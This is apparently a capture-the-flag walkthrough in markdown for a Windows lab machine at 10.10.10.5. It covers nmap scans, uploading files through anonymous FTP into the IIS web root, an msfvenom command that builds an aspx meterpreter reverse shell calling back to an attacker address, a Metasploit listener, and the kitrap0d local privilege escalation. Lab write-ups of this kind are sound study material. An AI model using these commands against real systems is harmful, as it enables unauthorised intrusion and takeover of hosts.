Skip to content

Latest commit

 

History

History
97 lines (91 loc) · 4.22 KB

devel.md

File metadata and controls

97 lines (91 loc) · 4.22 KB

Nmap

▶ nmap -Pn -sS -p- -T4 --min-rate 5000 10.10.10.5 -oN surface.scan

Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-07 15:28 IST
Nmap scan report for 10.10.10.5
Host is up (0.26s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 26.62 seconds
▶ nmap -sC -sV -p 21,80 --min-rate 5000 10.10.10.5 -oN deep.scan

Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-07 15:31 IST
Nmap scan report for 10.10.10.5
Host is up (0.26s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.37 seconds

FTP

image

HTTP

image

Foothold

  • Observe that the FTP server is in the same route as the HTTP server. Which means there stands a chance if file uploads are allowed a file is uploaded via FTP and it can be then accessed directly using the browser. image image

  • Create a text file with any random name and upload it. Then access the uploaded file in the browser. image image

MSFVenom

  • Generate a payload using MSFVenom for a reverse tcp connection to get a shell. image
▶ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.54 LPORT=4444 -f aspx -o rsp.aspx
  • Upload payload. image
  • Start listener. image
▶ sudo msfdb run
▶ use exploit/multi/handler
▶ set payload windows/meterpreter/reverse_tcp
▶ set LHOST tun0
▶ set LPORT 4444
▶ run
  • View sysinfo. image
meterpreter> sysinfo
  • Get a upgraded shell and view system information. image
meterpreter> shell
c:\windows\system32\inetsrv>getuid
c:\windows\system32\inetsrv>systeminfo
  • Exit the upgraded shell.
  • Search for exploit suggester.
  • Set session and run. image
  • Suggested exploits image
  • Use exploit image
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
  • Set exploit options image
  • Shell image image